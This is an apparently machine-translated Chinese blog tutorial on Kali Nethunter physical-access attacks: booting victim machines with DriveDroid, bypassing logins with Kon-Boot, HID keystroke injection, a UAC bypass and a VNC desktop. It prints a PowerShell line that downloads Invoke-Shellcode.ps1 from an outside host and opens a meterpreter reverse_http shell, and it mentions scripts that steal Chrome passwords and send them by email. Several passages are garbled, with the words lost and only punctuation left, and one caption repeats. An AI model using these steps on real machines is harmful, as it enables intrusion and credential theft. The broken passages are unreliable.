周期中的文章
问候,我的读者!希望您喜欢有关Nethuter的文章系列的前一部分(第一部分和第二部分)。今天,我们将重点关注攻击者本人可以直接(物理)访问受害者计算机的攻击。所以走吧
DriveDroid
DriveDroid是一个应用程序,可让您的设备假装为CD / DVD驱动器或USB闪存驱动器。它不包含在Nethunter中,但包含在Nethunter应用程序商店中(顺便说一下,在Play Market中也有)。当然,该应用程序需要root权限才能工作。
使用DriveDroid,您可以模拟ISO和IMG图像文件。该应用程序还可以创建固定大小(由用户设置)的空图像文件,并使用读取/写入功能对其进行仿真,这将对我们进一步有用。
该应用需要在首次启动时进行配置 屏幕将顺序显示,您需要在每个屏幕上执行某些操作:提供root权限,指定映像目录,选择使用USB的系统等。通常,该设置类似于“再加一点就可以了”的古老原则,因此我们不再赘述。我只会补充说,如果安装错误,则需要更改系统以使用USB,有多种选项可供选择(首选选项在顶部)。
图。1。DriveDroid设置和界面。
现在我们可以挂载各种映像并从中启动。最初,只有一个测试映像“ Drive Droid Boot Tester”可用。当您单击它时,将出现几个安装选项:
- 就像处于读取模式的USB闪存驱动器一样,
- /,
- .
我们选择要挂载的任何选项(我选择了“只读USB”),重新启动计算机,更改BIOS中设备的启动优先级,以便从外部设备启动是可取的(是的,就像重新安装Windows一样:)。如果一切都正确完成,则计算机将从仿真的测试映像启动(您将立即理解就是它)。
图2。 DriveDroid测试映像的启动屏幕。
此应用程序使我们可以通过一些LiveCD在受害者的计算机上引导,如果计算机上未安装硬盘加密,则可以下载必要的文件。原则上,您可以执行模拟LiveCD允许的任何操作:执行病毒扫描,重新分区,安装OS以及其他可能的选项。
我特别想提到Kon-Boot工具,该工具可让您绕过Windows和Mac计算机上的授权。发行说明为Windows这里和适用于Mac这里。最新版本的Windows实用程序甚至都知道如何绕过Windows 10上的在线授权。但是不要太高兴,因为该实用程序是付费的,其成本从25美元(一个操作系统的个人许可证)开始。您将不得不摇动您最喜欢的存钱罐。用法算法很简单:
- 使用DriveDroid挂载实用程序映像;
- 我们从中启动(如果需要,在BIOS中更改启动优先级),然后Kon-Boot加载程序将启动Windows启动;
- 我们选择任何用户,然后使用空密码进入该用户。
可以在此处观看 展示该作品(不是我的作品)的视频。
用户体验
(Kon-Boot 2.4) Windows 7 home extended . . DriveDroid. IMG- 30 , “Writable USB”. , Kon-Boot “”-.
HID攻击
Nethunter具有用于执行HID(人机接口设备)攻击的多种内置工具。要进行这些攻击,您需要直接访问受攻击的计算机,并具有对计算机执行某些操作的能力(必须将系统解锁)。HID攻击被系统视为合法的用户行为。通常,防病毒软件不能对攻击本身起作用,但可以对使用的负载起作用。例如,在下载恶意文件时或在下载未编码文件以转发计量表会话时。因此,可以减少攻击期间的常规操作时间,这在对受攻击机器的访问时间有限的情况下非常有用。
关于输入语言
, , . , , . : ( Ducky Script) ( HID Attacks Nethunter). - :
.3. .
, , . : , — . .
.3. .
, , . : , — . .
鸭子脚本
Ducky脚本是一种脚本语言,可用于编写代表用户执行的操作的脚本。具有解释程序的已连接设备将信号发送到计算机,以模拟键盘和鼠标输入。 Ducky Script用于USB Rubber Ducky设备(目前在亚马逊上售价约120美元)。
图4。 USB Rubber Ducky设备套件。
Nethunter具有内置的解释器(NetHunter应用程序-“ DuckHunter HID”选项卡),但是我无法使其正常工作。
图5。 Nethunter-DuckHunter HID。
但是在NetHunter Store中,有一个Rucky应用程序(v 1.9),它也是Duck Script解释器。该应用程序可以很好地发送键盘输入和击键,但是我的鼠标从未开始移动。
打开Rucky应用程序,编写脚本以启动带有链接的Chrome并启动它。
图6。糟透了 Chrome启动脚本。
Ducky脚本执行在计算机上的外观如何。
这里是收集的示例脚本。快速在墙纸上设置热狗,或从Chrome窃取密码并通过电子邮件发送密码...您可以想像得到的一切都有!
HID攻击
Nethunter应用程序具有“ HID攻击”选项卡。该组的攻击基于“设备模仿键盘输入”的原理进行,但它们针对的是特定模式。加上的是,有一个UAC旁路选项(用于Win7,Win8,Win10),使用该选项可以从管理员启动命令行。因此,您必须至少在本地管理员下登录,这样您不必输入管理员帐户的凭据。
图7。UAC旁路。
如何使攻击起作用
, , MIDI.
.8. MIDI.
.8. MIDI.
让我们看一下HID攻击中的模式。
Powersploit
此模式旨在从远程计算机运行Powershell脚本,该脚本应转发受攻击计算机的抄表器外壳。
数字: 9. Nethunter-HID攻击-PowerSploit。
数字: 10.在命令行上执行的结果。解码BASE64字符串的结果。 从屏幕截图中可以看到,攻击由于脚本执行问题而失败。根据指定的参数,我确定最有可能应使用EmpireProject存储库中的Invoke-Shellcode.ps1 。脚本Invoke-Shellcode.ps1或PowerSploit存储库已更新,并且不包含有效载荷参数。图中显示了脚本的旧“适合”版本的使用。 10. BASE64编码的字符串表示应用程序窗口中的所有参数。如果您进行了任何更改,请不要忘记下面的“ UPDATE”按钮,这一点很重要。
iex (New-Object Net.WebClient).DownloadString("http://192.168.1.45:80/Invoke-Shellcode.ps1"); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 192.168.1.45 -Lport 8080 -Force
因此,我们正在等待开发人员更新Nethunter应用程序的这一部分。
Windows CMD
这里的一切都很简单。在此模式下,将启动命令行并依次执行script参数中指定的命令。您也可以以管理员身份运行命令行,可以保存和加载保存的脚本。并且不要忘记“更新”按钮。
数字:11. Nethunter-HID攻击-Windows CMD。
数字:12.在命令行上执行的结果。
注意
“*”, . , “ipconfig” “pconfig”. :)
Powershell HTTP有效负载
此模式应加载并执行Powershell有效负载。但这对我根本不起作用:发动攻击时,没有采取任何措施,装有负载脚本的Web服务器的日志仍然为空。
图13 Nethunter-HID攻击-Powershell HTTP有效负载。
对于那些已经完成阅读的人来说,还有一点好处:)
KeX Manager
Full Kali Linux桌面界面,是的,是的! Nethunter具有内置的VNC服务器(虚拟网络计算-用于远程访问计算机桌面的系统)。一切都非常简单地设置。在Nethunter应用程序的KeX Manager选项卡中,单击“设置本地服务器”按钮,然后为我们的服务器设置密码。现在按“ START SERVER”,服务器状态已更改为“ RUNNING”。单击“ OPEN KEX CLIENT”,输入先前设置的密码,然后启动桌面界面。
图14。配置并连接到VNC服务器。
图15。连接到VNC服务器的结果。
如果要从另一台设备连接,则必须取消选中“仅Localhost”复选框,并且客户端可以“访问”服务器。我们重新启动服务器。然后在另一台设备上使用VNC客户端,我们通过指定Nethunter设备的IP和端口5901(例如192.168.1.3:5901)进行连接。然后我们输入先前设置的密码,现在我们已连接!
图16。从另一台设备连接到VNC服务器的结果。
目前为止就这样了。请记住,所有内容仅出于教育目的:)很快再见!
